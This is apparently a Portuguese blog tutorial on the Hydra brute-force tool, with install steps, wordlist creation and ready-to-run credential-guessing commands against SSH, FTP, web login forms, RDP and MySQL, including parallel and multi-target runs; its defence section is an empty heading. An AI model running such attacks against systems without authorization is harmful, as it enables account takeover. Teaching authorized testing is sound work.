O Hydra é uma das ferramentas mais poderosas para ataques de força bruta contra diversos protocolos de autenticação, permitindo testar credenciais fracas em serviços como SSH, FTP, HTTP, RDP, MySQL e muitos outros.
⚠ Atenção: Este guia é apenas para fins educacionais. Nunca utilize essa ferramenta sem permissão legal.
1. Instalando o Hydra
O Hydra está disponível para Linux, macOS e Windows, mas seu desempenho é melhor no Kali Linux e outras distribuições Linux.
1.1. Instalando no Kali Linux (já pré-instalado)
Se precisar reinstalar:
sudo apt update && sudo apt install hydra -y
1.2. Instalando no Ubuntu/Debian
sudo apt update && sudo apt install hydra -y
1.3. Instalando no Arch Linux
sudo pacman -S hydra
1.4. Instalando no macOS
Se tiver o Homebrew instalado:
brew install hydra
1.5. Instalando no Windows
-
Baixe o Hydra do site oficial:
-
Extraia os arquivos e execute via Cygwin ou WSL (Windows Subsystem for Linux).
Verifique se a instalação foi bem-sucedida:
hydra -h
Se exibir a ajuda da ferramenta, está tudo certo!
2. Criando Listas de Usuários e Senhas
Antes de começar os ataques, precisamos de listas de possíveis nomes de usuários e senhas.
2.1. Usando Listas Prontas
O Kali Linux vem com listas de senhas no diretório:
ls /usr/share/wordlists/
A mais famosa é o rockyou.txt:
gunzip -d /usr/share/wordlists/rockyou.txt.gz
Para usá-la:
cat /usr/share/wordlists/rockyou.txt | head -n 10
2.2. Criando uma Lista de Senhas Personalizada
Se quiser gerar uma lista personalizada:
nano minha_lista.txt
E adicione senhas comuns:
admin
Depois, salve com CTRL + X, Y e ENTER.
2.3. Criando Listas com Crunch
Se quiser gerar senhas automaticamente:
crunch 8 12 abc123 -o wordlist.txt
Isso cria uma lista de senhas de 8 a 12 caracteres usando os caracteres abc123.
3. Ataques de Força Bruta com Hydra
Agora vamos testar autenticações em diferentes serviços.
3.1. Ataque a SSH
hydra -L usuarios.txt -P senhas.txt ssh://192.168.1.1 -V
-
-L usuarios.txt→ Lista de usuários -
-P senhas.txt→ Lista de senhas -
ssh://192.168.1.1→ IP do servidor SSH -
-V→ Exibe cada tentativa
Se quiser testar um usuário específico:
hydra -l root -P senhas.txt ssh://192.168.1.1
3.2. Ataque a FTP
hydra -L usuarios.txt -P senhas.txt ftp://192.168.1.1
Ou para um usuário específico:
hydra -l admin -P senhas.txt ftp://192.168.1.1
3.3. Ataque a HTTP (Painel de Login)
Se um site tem um formulário de login, podemos testá-lo com Hydra.
-
Capture o POST request do login usando Burp Suite ou Wireshark.
-
Identifique os parâmetros do formulário.
-
Execute o Hydra com o seguinte comando:
hydra -L usuarios.txt -P senhas.txt 192.168.1.1 http-post-form "/login.php:user=^USER^&pass=^PASS^:F=login falhou"-
/login.php→ Página de login -
user=^USER^&pass=^PASS^→ Parâmetros do formulário -
F=login falhou→ Identifica falha de login na resposta
-
3.4. Ataque a RDP (Remote Desktop Protocol)
hydra -L usuarios.txt -P senhas.txt rdp://192.168.1.1
3.5. Ataque a MySQL
hydra -L usuarios.txt -P senhas.txt mysql://192.168.1.1
4. Ataque Distribuído e Paralelismo
O Hydra suporta ataques distribuídos e paralelos, tornando-o mais eficiente.
4.1. Aumentando o Número de Threads
Para aumentar a velocidade, use -t:
hydra -L usuarios.txt -P senhas.txt -t 8 ssh://192.168.1.1
Aqui, -t 8 significa 8 threads paralelas.
4.2. Executando Ataques em Múltiplos Servidores
hydra -L usuarios.txt -P senhas.txt -M servidores.txt ssh
No arquivo servidores.txt, liste os IPs dos alvos.
5. Como se Proteger contra Ataques de Força Bruta?
Agora que sabemos como o ataque funciona, veja como proteger seus sistemas:
6. Conclusão
O Hydra é uma ferramenta poderosa para testes de força bruta, sendo amplamente usada em testes de segurança e auditoria.
Agora, você tem um entendimento sólido sobre o Hydra e como utilizá-lo de maneira ética e responsável! 🚀
.jpeg){kind=logo}
0 Comentários